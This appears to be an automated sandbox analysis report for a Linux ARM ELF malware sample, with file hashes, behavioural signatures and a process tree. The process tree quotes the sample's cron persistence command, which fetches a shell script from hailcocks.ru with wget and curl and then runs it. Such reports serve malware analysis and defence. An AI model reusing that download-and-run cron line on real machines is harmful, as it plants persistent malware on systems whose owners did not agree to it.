Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28-10-2024 01:45

General

  • Target

    b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf

  • Size

    73KB

  • MD5

    c84fca197a6c0d8da1e804407643d901

  • SHA1

    b18d35378928ff15d652cdb21e48d48abac2ffa8

  • SHA256

    b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51

  • SHA512

    eaed6b072815f9cde6d907a3b13356c982f6fbda66d3893dbb04ee57cd995bd7925d09612a6cf6f738aec6d61440c206bd64cabb935884c302714a2331331532

  • SSDEEP

    1536:Fjr84jhcwmCpuxo7UfezBWKcqE3Ei919UCDZ:Fjr84jSwm47welfcq89E6

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 1 IoCs
  • Reads runtime system information 46 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf
    /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:653
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:654
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:661
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:659

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • /var/spool/cron/crontabs/tmp.TxaXvK

    Filesize

    306B

    MD5

    166013c72061a26359c4b71ea7e3f82c

    SHA1

    22f63cee554a4e6dade457c043fb687d6843b9e7

    SHA256

    9ae205f20ff39c525193c69898b9fb677905ed2e6b9de9a42311135923fe96fe

    SHA512

    bf5812345971eed2131e77131faccf5a779ebb92bb2b628c056fa339a0d714cba6fd370b5d0db55c439eac4833d9a097867167cfb0c5c70368a5b2563b1fdc06